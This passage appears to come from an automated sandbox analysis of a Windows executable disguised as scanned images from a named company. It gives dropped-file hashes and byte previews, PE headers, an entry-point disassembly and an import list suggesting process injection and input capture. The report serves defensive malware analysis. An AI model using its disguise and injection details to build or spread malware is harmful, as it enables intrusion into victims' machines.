                                                      Preview:uk...YI70..]....i.IJ...bMO...0PUZT7Q5TUTIIB81JNGYI70PUZT7Q5.UTIG].?J.N.h.1..{._8Ft%&&.0Y\j-&7'XDp7?tE$[t<:i..k.'!#<g:=ZqZT7Q5TU-H@..Q-.z9...02.N...n53.S..v. .S...i:3..\7=i)..81JNGYI7`.UZ.6P5E.M.IB81JNGY.72Q^[_7Q!PUTIIB81JNWMI70@UZT.U5TU.IIR81JLGYO70PUZT7W5TUTIIB8.NNG[I70PUZV7..TUDIIR81JNWYI'0PUZT7A5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7.A1- IIB\#NNGII70DQZT'Q5TUTIIB81JNGYi700UZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70P

                                                      C:\Users\user\AppData\Local\Temp\autB42C.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):271872
                                                      Entropy (8bit):7.993386307633134
                                                      Encrypted:true
                                                      SSDEEP:6144:velP3FogzISzT+rzY+eHZWnk62FfP5zatkFy1vDJ:Gl/ygkSQeW+ZP5uvd
                                                      MD5:E2ABE3AF2B1EFA391F592E0DB4914937
                                                      SHA1:EA3CC692BF07DBFE764F074BEF9B2CA0D944EE85
                                                      SHA-256:5AE2213AB114B3942CA41ACE0DE1518F9937165D293CE0B5E5960A59CF9ECFB8
                                                      SHA-512:B598EB4E0B41C465972A70CAD5444EE7E686B34205519B78E619FE3532F91CC5C4B89C8B3D4C2A2F5D5F730371D83F52D0F376E49294A8967CC955B87AA21263
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:uk...YI70..]....i.IJ...bMO...0PUZT7Q5TUTIIB81JNGYI70PUZT7Q5.UTIG].?J.N.h.1..{._8Ft%&&.0Y\j-&7'XDp7?tE$[t<:i..k.'!#<g:=ZqZT7Q5TU-H@..Q-.z9...02.N...n53.S..v. .S...i:3..\7=i)..81JNGYI7`.UZ.6P5E.M.IB81JNGY.72Q^[_7Q!PUTIIB81JNWMI70@UZT.U5TU.IIR81JLGYO70PUZT7W5TUTIIB8.NNG[I70PUZV7..TUDIIR81JNWYI'0PUZT7A5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7.A1- IIB\#NNGII70DQZT'Q5TUTIIB81JNGYi700UZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70P

                                                      C:\Users\user\AppData\Local\Temp\autB48B.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):9762
                                                      Entropy (8bit):7.637630929214253
                                                      Encrypted:false
                                                      SSDEEP:192:CZIUd0H8VoRVvrmhY2npAP3CYlDU8fcoNS05/kNZA1CCp7EXaWoB:Yd0HtRVH4qCDxkD/VCIEqWoB
                                                      MD5:EA5DF5C3FCD63E7A0F0D0992D12FAE38
                                                      SHA1:356A1A3ADB677378C1675532CED7B10910E11D16
                                                      SHA-256:3ADB99C43F41CAC29EA0D7E5613A4C3162946761C339B0451F34A76B3629C8C9
                                                      SHA-512:5DF23B27314181832A4C493AA4D62DB44F9FA5C32183519D99C3F9AEE81D9640131A9DF37A3843F70CC7C83F59B8D688627BC0BFC3653D38ED86C1F468CB0607
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3|vY..G.6.Yf.8_..oe..i|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...

                                                      C:\Users\user\AppData\Local\Temp\done

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File Type:FGDC-STD-001-1998
                                                      Category:dropped
                                                      Size (bytes):28674
                                                      Entropy (8bit):3.5799572889089
                                                      Encrypted:false
                                                      SSDEEP:384:gAQKCZbwwQ4/6BEsM6IYj84F5Fdu/euMcL1R22qO6FsVWfGbLph1juTJOtHtiP:PQKeIksMMIM7yX22GFs+GbLph1jXtAP
                                                      MD5:998E89F2198CD4BC35DC6E234B79C27E
                                                      SHA1:6CE9AFB3032C3C76689B34758B8F7CEAD44A1423
                                                      SHA-256:73D8935C5FF8CFF761BB5988CEFE41C184A656C1C41C11013C6161E0A11020CB
                                                      SHA-512:A504D03D1BCBAF98B5611E6B46DFE54A254290E69B46DEF252FAE532CB809E7DD914ECB0C73557A83071278832A59503EFA43CAA099C27B8D80A4E7502EDE371
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:

                                                      C:\Users\user\AppData\Local\Temp\j0941BH0

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\schtasks.exe
                                                      File Type:Unknown
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1221538113908904
                                                      Encrypted:false
                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.207748478140611
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File size:1'211'904 bytes
                                                      MD5:58077f7b69ca6e33ec9a13f1b2b53c02
                                                      SHA1:09c02cdd3a29100c0398c4a2192bfbfef34fb94c
                                                      SHA256:758ad60c19d53019939eeb1ac2502931f5f6c17ae9184372f8f30efac42f90c1
                                                      SHA512:a5739b504ee8ab35745fb30ccd665ad79da5d1825481c9ca2f2016b1e5b5cafddfe47759c6d7db6a63c486580a9267ba34bd22856a65c1ef95a54455bdafc3c3
                                                      SSDEEP:24576:iAHnh+eWsN3skA4RV1Hom2KXMmHabm7/wNlusWwN4nGf5:lh+ZkldoPK8YabmENJWwinS
                                                      TLSH:7845BD0273D6D036FFAA92739B6AB20156BC7D290133852F13982DB9BD701B1267D663
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                      File Icon

                                                      Icon Hash:6142420142183038

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x42800a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66B96D84 [Mon Aug 12 02:03:48 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FCC1D14173Dh
                                                      jmp 00007FCC1D1344F4h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FCC1D13467Ah
                                                      cmp edi, eax
                                                      jc 00007FCC1D1349DEh
                                                      bt dword ptr [004C41FCh], 01h
                                                      jnc 00007FCC1D134679h
                                                      rep movsb
                                                      jmp 00007FCC1D13498Ch
                                                      cmp ecx, 00000080h
                                                      jc 00007FCC1D134844h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FCC1D134680h
                                                      bt dword ptr [004BF324h], 01h
                                                      jc 00007FCC1D134B50h
                                                      bt dword ptr [004C41FCh], 00000000h
                                                      jnc 00007FCC1D13481Dh
                                                      test edi, 00000003h
                                                      jne 00007FCC1D13482Eh
                                                      test esi, 00000003h
                                                      jne 00007FCC1D13480Dh
                                                      bt edi, 02h
                                                      jnc 00007FCC1D13467Fh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FCC1D134683h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FCC1D1346D5h
                                                      bt esi, 03h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD5 build 40629
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD5 build 40629

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5d624.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x7134.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc80000x5d6240x5d800dc23ce9c4a2692103d7446f0434e7c32False0.9699145638368984data7.969322527303809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1260000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc84580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc85800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc86a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc87d00x1024Device independent bitmap graphic, 32 x 62 x 32, image size 3968, resolution 4724 x 4724 px/mEnglishGreat Britain0.23426911907066797
                                                      RT_MENU0xc97f40x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xc98440x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xc9dd80x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xca4640x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xca8f40x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xcaef00x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcb54c0x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcb9b40x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcbb0c0x595fcdata1.000330532457741
                                                      RT_GROUP_ICON0x1251080x14dataEnglishGreat Britain1.2
                                                      RT_GROUP_ICON0x12511c0x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x1251300x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x1251440x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x1251580xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x1252340x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
